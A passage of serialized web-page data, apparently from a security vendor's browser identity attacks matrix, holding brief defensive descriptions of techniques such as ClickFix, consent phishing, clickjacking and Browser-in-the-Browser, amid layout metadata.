4,"id":18858,"query":18875,"published":13,"firstPublished":18876,"rev":18877},"SAT1051 \u002F ConsentFix",1790176052332,{"title":18860,"name":18860,"url":18863,"blocks":18864,"state":18870},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fconsentfix",[18865],{"id":18866,"@type":44,"tagName":73,"properties":18867,"responsiveStyles":18868},"builder-pixel-hvq54qbrxst",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18869},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18871},{"path":21,"query":18872},{},{"kind":20},1790176052311,[],1790176799781,"9kr64qnrlsj",{"tag":18879},{"@type":105,"id":18880,"model":17052,"value":18881},"8c786c079659455a8a96e85d357064b0",{"name":18882,"createdDate":18883,"modelId":17056,"data":18884,"meta":18895,"lastUpdated":18896,"id":18880,"query":18897,"published":13,"firstPublished":18898,"rev":18899},"SAT1010 \u002F Consent phishing",1790176086105,{"title":18882,"name":18882,"url":18885,"blocks":18886,"state":18892},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fconsent-phishing",[18887],{"id":18888,"@type":44,"tagName":73,"properties":18889,"responsiveStyles":18890},"builder-pixel-t5vlaphp9mo",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18891},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18893},{"path":21,"query":18894},{},{"kind":20},1790176086036,[],1790176799745,"kiw33rwoc7h","ConsentFix is a hybrid of ClickFix and consent phishing. The user is presented with a ClickFix-style fake error prompt that walks them through granting OAuth consent to an attacker-controlled application. Combines the social engineering pattern of ClickFix with the persistence of OAuth token abuse.","regular:faCheckDouble",{"deviceSize":83,"location":18903},{"path":21,"query":18904},{},"fa3f967486174c10a2a90f404511466f",1790585490790,{"hasAutosaves":19,"kind":20},1790177827682,[],{"createdDate":18911,"data":18912,"id":18944,"lastUpdated":18945,"meta":18946,"modelId":17142,"name":265,"published":13,"firstPublished":18947,"query":18948,"rev":17145},1790177693868,{"attackTechniques":18913,"browserIdentityAttacksMatrix":18923,"description":18938,"hint":18939,"icon":18940,"state":18941,"title":265,"visibleOnPage":19},[18914],{"attacks":18915},{"@type":105,"id":485,"model":452,"value":18916},{"createdDate":487,"id":485,"name":265,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18917,"data":18918,"variations":18919,"lastUpdated":491,"firstPublished":492,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18920,"meta":18921,"rev":18854},[],{"name":265,"url":267},{},[],{"breakpoints":18922,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[18924],{"tag":18925},{"@type":105,"id":18880,"model":17052,"value":18926},{"name":18882,"createdDate":18883,"modelId":17056,"data":18927,"meta":18936,"lastUpdated":18896,"id":18880,"query":18937,"published":13,"firstPublished":18898,"rev":18899},{"title":18882,"name":18882,"url":18885,"blocks":18928,"state":18933},[18929],{"id":18888,"@type":44,"tagName":73,"properties":18930,"responsiveStyles":18931},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18932},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18934},{"path":21,"query":18935},{},{"kind":20},[],"Consent phishing is a social engineering attack that tricks users into granting OAuth permissions to an attacker-controlled application, typically via a fake app consent prompt that mimics a legitimate service. Once granted, the malicious integration gives the same durable, MFA-proof access exploited in supply chain OAuth attacks (see Malicious OAuth integrations). The user clicks \"Allow\" thinking they're authorizing a trusted app, but they're granting the attacker persistent API access to their account.","Also known as: illicit consent grant \u002F OAuth phishing \u002F app consent attack","regular:faHandshake",{"deviceSize":83,"location":18942},{"path":21,"query":18943},{},"2758ea32454b47ce80bc32857316231f",1790585489910,{"kind":20},1790177827688,[],{"createdDate":18950,"data":18951,"id":18977,"lastUpdated":18978,"meta":18979,"modelId":17142,"name":18976,"published":13,"firstPublished":18980,"query":18981,"rev":17145},1790177693508,{"attackTechniques":18952,"description":18971,"icon":18972,"state":18973,"title":18976,"visibleOnPage":19},[18953,18962],{"attacks":18954},{"@type":105,"id":468,"model":452,"value":18955},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18956,"data":18957,"variations":18958,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18959,"meta":18960,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18961,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18963},{"@type":105,"id":541,"model":452,"value":18964},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18965,"data":18966,"variations":18967,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18968,"meta":18969,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":18970,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Compromised websites are legitimate websites that have been injected with malicious code — through vulnerabilities in the CMS (typically WordPress), compromised admin credentials, or supply chain attacks on third-party scripts and plugins. Visitors encounter drive-by downloads, fake browser update prompts, injected redirect chains, cryptomining scripts, or SEO spam. The site looks and behaves normally except for the injected payload, so users have no reason to distrust it. Watering hole attacks are a targeted subset where attackers deliberately compromise sites frequented by a specific organization or industry.","regular:faGlobe",{"deviceSize":83,"location":18974},{"path":21,"query":18975},{},"Compromised websites","348d1e6a50e04f129def7ce1f714424c",1790585488188,{"kind":20},1790177827694,[],{"createdDate":18983,"data":18984,"id":19001,"lastUpdated":19002,"meta":19003,"modelId":17142,"name":19000,"published":13,"firstPublished":19004,"query":19005,"rev":17145},1790177693121,{"attackTechniques":18985,"description":18995,"icon":18996,"state":18997,"title":19000,"visibleOnPage":19},[18986],{"attacks":18987},{"@type":105,"id":468,"model":452,"value":18988},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18989,"data":18990,"variations":18991,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18992,"meta":18993,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18994,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"CloudFix is a ClickFix variant that impersonates cloud service error messages (e.g. OneDrive, Google Drive, Dropbox) to trick users into executing malicious commands. Same underlying technique as ClickFix — fake error, clipboard hijack, PowerShell execution — with cloud-themed lures.","regular:faCloudSlash",{"deviceSize":83,"location":18998},{"path":21,"query":18999},{},"CloudFix","3c12c277adcd498a8af067ffe983563b",1790585487084,{"kind":20},1790177827699,[],{"createdDate":19007,"data":19008,"id":19025,"lastUpdated":19026,"meta":19027,"modelId":17142,"name":19024,"published":13,"firstPublished":19028,"query":19029,"rev":17145},1790177692529,{"attackTechniques":19009,"description":19019,"icon":19020,"state":19021,"title":19024,"visibleOnPage":19},[19010],{"attacks":19011},{"@type":105,"id":468,"model":452,"value":19012},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19013,"data":19014,"variations":19015,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19016,"meta":19017,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":19018,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Clipboard hijacking (or pastejacking) swaps what a user copied for content the attacker chose. The name is shared by two distinct attack patterns. In the ClickFix context, attackers use JavaScript to overwrite clipboard contents so that when users paste into a terminal, they execute malicious commands instead of what they copied. In the crypto context, malware monitors the clipboard for wallet addresses and silently swaps them with attacker-controlled addresses.","regular:faClipboard",{"deviceSize":83,"location":19022},{"path":21,"query":19023},{},"Clipboard hijacking \u002F pastejacking","97c93ebc1cb74c48b32176f322699f25",1790585485907,{"kind":20},1790177827704,[],{"createdDate":19031,"data":19032,"id":19073,"lastUpdated":19074,"meta":19075,"modelId":17142,"name":19072,"published":13,"firstPublished":19076,"query":19077,"rev":17145},1790177692054,{"attackTechniques":19033,"browserIdentityAttacksMatrix":19043,"description":19066,"hint":19067,"icon":19068,"state":19069,"title":19072,"visibleOnPage":19},[19034],{"attacks":19035},{"@type":105,"id":485,"model":452,"value":19036},{"createdDate":487,"id":485,"name":265,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19037,"data":19038,"variations":19039,"lastUpdated":491,"firstPublished":492,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19040,"meta":19041,"rev":18854},[],{"name":265,"url":267},{},[],{"breakpoints":19042,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19044],{"tag":19045},{"@type":105,"id":19046,"model":17052,"value":19047},"3bef33e8fd614a6181b08a0737039b00",{"name":19048,"createdDate":19049,"modelId":17056,"data":19050,"meta":19061,"lastUpdated":19062,"id":19046,"query":19063,"published":13,"firstPublished":19064,"rev":19065},"SAT1049 \u002F UI redressing",1790176103516,{"title":19048,"name":19048,"url":19051,"blocks":19052,"state":19058},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fui-redressing",[19053],{"id":19054,"@type":44,"tagName":73,"properties":19055,"responsiveStyles":19056},"builder-pixel-czldr7g6zl",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19057},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19059},{"path":21,"query":19060},{},{"kind":20},1790176103429,[],1790176799536,"n4h633pw3lj","Clickjacking is an attack that tricks users into clicking something different from what they perceive, typically by overlaying a transparent iframe over a legitimate page element. The user believes they're clicking a visible button but actually triggers an action on a hidden page underneath. A delivery vector — used to trigger consent grants, initiate downloads, or perform actions on another site without the user's knowledge.","Also known as: UI redress attack \u002F likejacking","regular:faLayerGroup",{"deviceSize":83,"location":19070},{"path":21,"query":19071},{},"Clickjacking","b3887e06d5264a07ba4cd7bcb2d43f48",1790585484825,{"kind":20},1790177827708,[],{"createdDate":19079,"data":19080,"id":19121,"lastUpdated":19122,"meta":19123,"modelId":17142,"name":474,"published":13,"firstPublished":19124,"query":19125,"rev":17145},1790177691539,{"attackTechniques":19081,"browserIdentityAttacksMatrix":19100,"description":19115,"hint":19116,"icon":19117,"state":19118,"title":474,"visibleOnPage":19},[19082,19091],{"attacks":19083},{"@type":105,"id":468,"model":452,"value":19084},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19085,"data":19086,"variations":19087,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19088,"meta":19089,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":19090,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":19092},{"@type":105,"id":541,"model":452,"value":19093},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19094,"data":19095,"variations":19096,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19097,"meta":19098,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":19099,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19101],{"tag":19102},{"@type":105,"id":18858,"model":17052,"value":19103},{"name":18860,"createdDate":18861,"modelId":17056,"data":19104,"meta":19113,"lastUpdated":18874,"id":18858,"query":19114,"published":13,"firstPublished":18876,"rev":18877},{"title":18860,"name":18860,"url":18863,"blocks":19105,"state":19110},[19106],{"id":18866,"@type":44,"tagName":73,"properties":19107,"responsiveStyles":19108},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19109},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19111},{"path":21,"query":19112},{},{"kind":20},[],"ClickFix is a social engineering attack that tricks users into copying and executing malicious commands by presenting a fake error message with \"fix\" instructions. These commands typically result in the deployment of infostealer malware and remote access tooling. ClickFix lures and sub-techniques are hugely varied as a result of high levels of attacker investment in new tools and methods.","Also known as: FakeFix \u002F ClearFix \u002F fake CAPTCHA \u002F paste-and-run attacks","regular:faArrowPointer",{"deviceSize":83,"location":19119},{"path":21,"query":19120},{},"1ef4b835e1104a00a5835ba68fcca99f",1790585484025,{"kind":20},1790177827713,[],{"createdDate":19127,"data":19128,"id":19161,"lastUpdated":19162,"meta":19163,"modelId":17142,"name":19160,"published":13,"firstPublished":19164,"query":19165,"rev":17145},1790177691108,{"attackTechniques":19129,"browserIdentityAttacksMatrix":19139,"description":19154,"hint":19155,"icon":19156,"state":19157,"title":19160,"visibleOnPage":19},[19130],{"attacks":19131},{"@type":105,"id":611,"model":452,"value":19132},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19133,"data":19134,"variations":19135,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19136,"meta":19137,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":19138,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19140],{"tag":19141},{"@type":105,"id":17051,"model":17052,"value":19142},{"name":17054,"createdDate":17055,"modelId":17056,"data":19143,"meta":19152,"lastUpdated":17069,"id":17051,"query":19153,"published":13,"firstPublished":17071,"rev":17072},{"title":17054,"name":17054,"url":17058,"blocks":19144,"state":19149},[19145],{"id":17061,"@type":44,"tagName":73,"properties":19146,"responsiveStyles":19147},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19148},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19150},{"path":21,"query":19151},{},{"kind":20},[],"Callback phishing is a phishing attack with no malicious link or attachment — instead, the email contains a phone number and a pretext (fake invoice, subscription renewal, security alert) designed to get the victim to call. Once on the phone, the attacker walks the victim through actions in their browser: visiting a malicious site, downloading remote access software, or entering credentials on a phishing page.","Also known as: TOAD (telephone-oriented attack delivery) \u002F hybrid vishing","regular:faPhoneArrowDownLeft",{"deviceSize":83,"location":19158},{"path":21,"query":19159},{},"Callback phishing","5288cb4ceb9e46e0ad0910d0eb5a88d1",1790585385484,{"kind":20},1790177827725,[],{"createdDate":19167,"data":19168,"id":19194,"lastUpdated":19195,"meta":19196,"modelId":17142,"name":19193,"published":13,"firstPublished":19197,"query":19198,"rev":17145},1790177690681,{"attackTechniques":19169,"description":19188,"icon":19189,"state":19190,"title":19193,"visibleOnPage":19},[19170,19179],{"attacks":19171},{"@type":105,"id":569,"model":452,"value":19172},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":19173,"stageModifiedSincePublish":6,"query":19175,"data":19176,"variations":19177,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19178,"rev":17427},{"breakpoints":19174,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],{"attacks":19180},{"@type":105,"id":468,"model":452,"value":19181},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19182,"data":19183,"variations":19184,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19185,"meta":19186,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":19187,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Browser notification spam is the abuse of the Web Push Notifications API to deliver scam alerts, fake virus warnings, and phishing links directly to a user's desktop or mobile device. The attack starts when a user grants notification permission — often via a deceptive \"click Allow to continue\" prompt. Once granted, attackers can push notifications at will. A delivery vector for malicious downloads and ClickFix-style social engineering.","regular:faBellRing",{"deviceSize":83,"location":19191},{"path":21,"query":19192},{},"Browser notification spam","d0a7396108ca4913876a7b345c7a7af2",1790585482425,{"kind":20},1790177827731,[],{"createdDate":19200,"data":19201,"id":19228,"lastUpdated":19229,"meta":19230,"modelId":17142,"name":19227,"published":13,"firstPublished":19231,"query":19232,"rev":17145},1790177690267,{"attackTechniques":19202,"browserIdentityAttacksMatrix":19212,"description":19222,"icon":19223,"state":19224,"title":19227,"visibleOnPage":19},[19203],{"attacks":19204},{"@type":105,"id":451,"model":452,"value":19205},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19206,"data":19207,"variations":19208,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":19209,"lastUpdateSource":60,"meta":19210,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":19211,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19213],{"tag":19214},{"@type":105,"id":17075,"model":17052,"value":19215},{"createdDate":17077,"id":17075,"name":17078,"modelId":17056,"published":13,"meta":19216,"stageModifiedSincePublish":6,"query":19218,"data":19219,"variations":19220,"lastUpdated":17085,"firstPublished":17086,"testRatio":31,"createdBy":32,"folders":19221,"lastUpdateSource":60,"lastUpdatedBy":478,"rev":17088},{"breakpoints":19217,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":17078,"url":17083},{},[],"Browser-in-the-Browser (BitB) is a phishing technique that uses HTML, CSS, and JavaScript to render a fake browser pop-up window — complete with a spoofed address bar, padlock icon, and SSO branding — inside a real web page. Targets \"Sign in with Google\u002FMicrosoft\u002FApple\" flows. Same underlying attack as AiTM phishing with additional UI trickery to make the fake login window more convincing.","regular:faClone",{"deviceSize":83,"location":19225},{"path":21,"query":19226},{},"Browser-in-the-Browser (BitB)","beabfff6ca1e4e66bc3d8407bd884a25",1790585481585,{"kind":20},1790177827739,[],{"createdDate":19234,"data":19235,"id":19261,"lastUpdated":19262,"meta":19263,"modelId":17142,"name":19260,"published":13,"firstPublished":19264,"query":19265,"rev":17145},1790177689444,{"attackTechniques":19236,"description":19255,"icon":19256,"state":19257,"title":19260,"visibleOnPage":19},[19237,19246],{"attacks":19238},{"@type":105,"id":569,"model":452,"value":19239},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":19240,"stageModifiedSincePublish":6,"query":19242,"data":19243,"variations":19244,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19245,"rev":17427},{"breakpoints":19241,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],{"attacks":19247},{"@type":105,"id":555,"model":452,"value":19248},{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19249,"data":19250,"variations":19251,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19252,"meta":19253,"rev":17956},[],{"name":275,"url":277},{},[],{"breakpoints":19254,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Browser hijacking is the modification of browser settings (homepage, default search engine, new tab page) without user consent. Achieved via malicious extensions, bundled software, or registry\u002Fconfig changes. Historically toolbar-based; modern variants are extension-based. Not a distinct attack — it's the outcome of adware, PUPs, or malicious extensions.","regular:faSliders",{"deviceSize":83,"location":19258},{"path":21,"query":19259},{},"Browser hijacking","c120241e8b7949c1b2d3dda65f7da9cb",1790585480623,{"kind":20},1790177827745,[],{"createdDate":19267,"data":19268,"id":19284,"lastUpdated":19285,"meta":19286,"modelId":17142,"name":19283,"published":13,"firstPublished":19287,"query":19288,"rev":17145},1790177688735,{"attackTechniques":19269,"description":19279,"icon":17547,"state":19280,"title":19283,"visibleOnPage":19},[19270],{"attacks":19271},{"@type":105,"id":555,"model":452,"value":19272},{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19273,"data":19274,"variations":19275,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19276,"meta":19277,"rev":17956},[],{"name":275,"url":277},{},[],{"breakpoints":19278,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Browser extension supply chain attacks compromise legitimate browser extensions to inject malicious code that affects all existing users. An attacker gains access to the extension developer's account or build pipeline, pushes a malicious update, and the compromised version auto-deploys to every user of that extension.",{"deviceSize":83,"location":19281},{"path":21,"query":19282},{},"Browser extension supply chain attacks","64b7f46814ae4c9ea330d3e386e02906",1790585479785,{"kind":20},1790177827750,[],{"createdDate":19290,"data":19291,"id":19324,"lastUpdated":19325,"meta":19326,"modelId":17142,"name":19323,"published":13,"firstPublished":19327,"query":19328,"rev":17145},1790177688270,{"attackTechniques":19292,"browserIdentityAttacksMatrix":19302,"description":19317,"hint":19318,"icon":19319,"state":19320,"title":19323,"visibleOnPage":19},[19293],{"attacks":19294},{"@type":105,"id":611,"model":452,"value":19295},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19296,"data":19297,"variations":19298,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19299,"meta":19300,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":19301,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19303],{"tag":19304},{"@type":105,"id":17113,"model":17052,"value":19305},{"name":17115,"createdDate":17116,"modelId":17056,"data":19306,"meta":19315,"lastUpdated":17129,"id":17113,"query":19316,"published":13,"firstPublished":17131,"rev":17132},{"title":17115,"name":17115,"url":17118,"blocks":19307,"state":19312},[19308],{"id":17121,"@type":44,"tagName":73,"properties":19309,"responsiveStyles":19310},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19311},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19313},{"path":21,"query":19314},{},{"kind":20},[],"App-specific password phishing is a phishing attack that targets app-specific passwords — legacy credentials that some services (Google, Microsoft, Yahoo) allow users to generate for apps that don't support modern authentication. These passwords bypass MFA entirely because they're designed for clients that can't handle interactive sign-in flows. Attackers phish users for these passwords or trick them into generating one, gaining persistent access that isn't protected by MFA and often isn't visible in normal sign-in logs.","Also known as: ASP phishing \u002F application password phishing","regular:faKey",{"deviceSize":83,"location":19321},{"path":21,"query":19322},{},"App-specific password phishing","15538478811d49a49fcda3b61604980b",1790585477727,{"kind":20},1790177827755,[],{"createdDate":19330,"data":19331,"id":19348,"lastUpdated":19349,"meta":19350,"modelId":17142,"name":19347,"published":13,"firstPublished":19351,"query":19352,"rev":17145},1790177687852,{"attackTechniques":19332,"description":19342,"icon":19343,"state":19344,"title":19347,"visibleOnPage":19},[19333],{"attacks":19334},{"@type":105,"id":611,"model":452,"value":19335},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19336,"data":19337,"variations":19338,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19339,"meta":19340,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":19341,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"AI-generated phishing uses AI to generate elements of the lure, page, infrastructure, and so on. AI eliminates the grammatical errors and formatting inconsistencies that traditional phishing awareness training teaches users to spot. AI can also be used to generate and serve tailored, rotating lures and infrastructure to victims to evade detection and improve success rates.","regular:faSparkles",{"deviceSize":83,"location":19345},{"path":21,"query":19346},{},"AI-generated phishing","6d899c569ea042759379118d63d2a2df",1790585476814,{"kind":20},1790177827761,[],{"createdDate":19354,"data":19355,"id":19381,"lastUpdated":19382,"meta":19383,"modelId":17142,"name":19380,"published":13,"firstPublished":19384,"query":19385,"rev":17145},1790177687325,{"attackTechniques":19356,"description":19375,"icon":19376,"state":19377,"title":19380,"visibleOnPage":19},[19357,19366],{"attacks":19358},{"@type":105,"id":569,"model":452,"value":19359},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":19360,"stageModifiedSincePublish":6,"query":19362,"data":19363,"variations":19364,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19365,"rev":17427},{"breakpoints":19361,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],{"attacks":19367},{"@type":105,"id":555,"model":452,"value":19368},{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19369,"data":19370,"variations":19371,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19372,"meta":19373,"rev":17956},[],{"name":275,"url":277},{},[],{"breakpoints":19374,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Adware and potentially unwanted programs (PUPs) inject ads into the browser, change the homepage or default search engine, or install toolbars without meaningful consent. Distributed through bundled software installers, deceptive download buttons, and rogue browser extensions. Historically associated with browser toolbars; now more commonly delivered via extensions. Overlaps with browser hijacking.","regular:faWindow",{"deviceSize":83,"location":19378},{"path":21,"query":19379},{},"Adware \u002F Potentially Unwanted Programs (PUPs)","c955c051e0fd422dbd2bfc10315e67f8",1790585474098,{"kind":20},1790177827765,[],{"createdDate":19387,"data":19388,"id":19476,"lastUpdated":19477,"meta":19478,"modelId":17142,"name":19475,"published":13,"createdBy":478,"firstPublished":19480,"folders":19481,"lastUpdateSource":60,"lastUpdatedBy":478,"query":19482,"stageModifiedSincePublish":6,"testRatio":31,"variations":19483,"rev":17145},1790176916243,{"attackTechniques":19389,"browserIdentityAttacksMatrix":19426,"description":19469,"hint":19470,"icon":19471,"state":19472,"title":19475,"visibleOnPage":19},[19390,19399,19408,19417],{"attacks":19391},{"@type":105,"id":485,"model":452,"value":19392},{"createdDate":487,"id":485,"name":265,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19393,"data":19394,"variations":19395,"lastUpdated":491,"firstPublished":492,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19396,"meta":19397,"rev":18854},[],{"name":265,"url":267},{},[],{"breakpoints":19398,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":19400},{"@type":105,"id":513,"model":452,"value":19401},{"createdDate":515,"id":513,"name":260,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19402,"data":19403,"variations":19404,"lastUpdated":519,"firstPublished":520,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19405,"meta":19406,"rev":18631},[],{"name":260,"url":262},{},[],{"breakpoints":19407,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":19409},{"@type":105,"id":468,"model":452,"value":19410},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19411,"data":19412,"variations":19413,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19414,"meta":19415,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":19416,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":19418},{"@type":105,"id":583,"model":452,"value":19419},{"createdDate":585,"id":583,"name":270,"modelId":456,"published":13,"meta":19420,"stageModifiedSincePublish":6,"query":19422,"data":19423,"variations":19424,"lastUpdated":591,"firstPublished":592,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19425,"rev":17499},{"breakpoints":19421,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":270,"url":272},{},[],[19427,19441,19455],{"tag":19428},{"@type":105,"id":18880,"model":17052,"value":19429},{"name":18882,"createdDate":18883,"modelId":17056,"data":19430,"meta":19439,"lastUpdated":18896,"id":18880,"query":19440,"published":13,"firstPublished":18898,"rev":18899},{"title":18882,"name":18882,"url":18885,"blocks":19431,"state":19436},[19432],{"id":18888,"@type":44,"tagName":73,"properties":19433,"responsiveStyles":19434},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19435},{"height":66,"width":66,